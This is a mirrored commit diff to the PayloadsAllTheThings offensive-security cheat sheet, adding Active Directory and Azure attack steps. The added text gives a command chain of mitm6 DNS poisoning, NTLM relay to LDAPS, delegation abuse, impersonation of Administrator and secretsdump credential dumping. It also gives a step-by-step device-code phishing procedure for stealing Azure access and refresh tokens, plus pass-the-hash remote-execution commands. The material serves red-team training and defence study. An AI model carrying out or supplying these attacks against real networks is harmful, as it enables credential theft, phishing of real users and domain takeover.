mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Device Code Phish
This commit is contained in:
parent
d484212de9
commit
1a3058f40c
@ -67,7 +67,7 @@
|
|||||||
- [Drop the MIC](#drop-the-mic)
|
- [Drop the MIC](#drop-the-mic)
|
||||||
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
||||||
- [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay)
|
- [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay)
|
||||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
- [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6)
|
||||||
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
||||||
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
||||||
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
||||||
@ -1216,6 +1216,7 @@ LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastS
|
|||||||
### Password in AD User comment
|
### Password in AD User comment
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
$ crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc
|
||||||
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
|
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
|
||||||
GET-DESC... 10.0.2.11 389 dc01 [+] Found following users:
|
GET-DESC... 10.0.2.11 389 dc01 [+] Found following users:
|
||||||
GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain
|
GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain
|
||||||
@ -1928,7 +1929,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
#### Relay delegation with mitm6
|
#### DNS Poisonning - Relay delegation with mitm6
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
- IPv6 enabled (Windows prefers IPV6 over IPv4)
|
- IPv6 enabled (Windows prefers IPV6 over IPv4)
|
||||||
@ -1942,13 +1943,28 @@ cd /opt/tools/mitm6
|
|||||||
pip install .
|
pip install .
|
||||||
|
|
||||||
mitm6 -hw ws02 -d lab.local --ignore-nofqnd
|
mitm6 -hw ws02 -d lab.local --ignore-nofqnd
|
||||||
|
# -d: the domain name that we filter our request on (the attacked domain)
|
||||||
|
# -i: the interface we have mitm6 listen on for events
|
||||||
|
# -hw: host whitelist
|
||||||
|
|
||||||
|
ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad
|
||||||
|
ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer
|
||||||
|
# -ip: the interface you want the relay to run on
|
||||||
|
# -wh: WPAD host, specifying your wpad file to serve
|
||||||
|
# -t: the target where you want to relay to
|
||||||
|
|
||||||
|
# now granting delegation rights and then do a RBCD
|
||||||
ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
|
ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
|
||||||
then use rubeus with s4u to relay the delegation
|
getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator
|
||||||
|
export KRB5CCNAME=administrator.ccache
|
||||||
|
secretsdump.py -k -no-pass target.lab.local
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Active Directory Certificate Services
|
### Active Directory Certificate Services
|
||||||
|
|
||||||
|
Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||||
|
|
||||||
#### ESC1 - Misconfigured Certificate Templates
|
#### ESC1 - Misconfigured Certificate Templates
|
||||||
|
|
||||||
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
|
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
|
||||||
|
@ -13,6 +13,7 @@
|
|||||||
* [Enumeration methodology](#enumeration-methodology)
|
* [Enumeration methodology](#enumeration-methodology)
|
||||||
* [Phishing with Evilginx2](#phishing-with-evilginx2)
|
* [Phishing with Evilginx2](#phishing-with-evilginx2)
|
||||||
* [Illicit Consent Grant](#illicit-consent-grant)
|
* [Illicit Consent Grant](#illicit-consent-grant)
|
||||||
|
* [Device Code Phish](#device-code-phish)
|
||||||
* [Token from Managed Identity](#token-from-managed-identity)
|
* [Token from Managed Identity](#token-from-managed-identity)
|
||||||
* [Azure API via Powershell](#azure-api-via-powershell)
|
* [Azure API via Powershell](#azure-api-via-powershell)
|
||||||
* [Azure API via Python Version](#azure-api-via-python-version)
|
* [Azure API via Python Version](#azure-api-via-python-version)
|
||||||
@ -427,6 +428,21 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
|
|||||||
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
|
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
|
||||||
|
|
||||||
|
|
||||||
|
## Device Code Phish
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
* Azure AD / Office 365 E3 Subscription
|
||||||
|
|
||||||
|
Exploitation:
|
||||||
|
|
||||||
|
* Import TokenTactics: `PS C:\TokenTactics> Import-Module .\TokenTactics.psd1`
|
||||||
|
* Request a device code for the Azure Graph API using TokenTactics: `Get-AzureToken -Client Graph`
|
||||||
|
* Replace `<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft)
|
||||||
|
* Leave TokenTactics running in the PowerShell window and send the phishing email
|
||||||
|
* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
|
||||||
|
* Enjoy your **Access Token** & **Refresh Token**
|
||||||
|
|
||||||
|
|
||||||
## Token from Managed Identity
|
## Token from Managed Identity
|
||||||
|
|
||||||
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
||||||
@ -1091,3 +1107,4 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
|
|||||||
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
||||||
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
||||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||||
|
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
@ -220,6 +220,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
|
|||||||
|
|
||||||
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
||||||
:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`.
|
:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`.
|
||||||
|
:warning: French characters might not be correctly displayed on your output, use `-codec ibm850` to fix this.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||||
@ -235,7 +236,6 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
|
|||||||
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||||
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
|
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
|
||||||
|
|
||||||
|
|
||||||
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
||||||
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user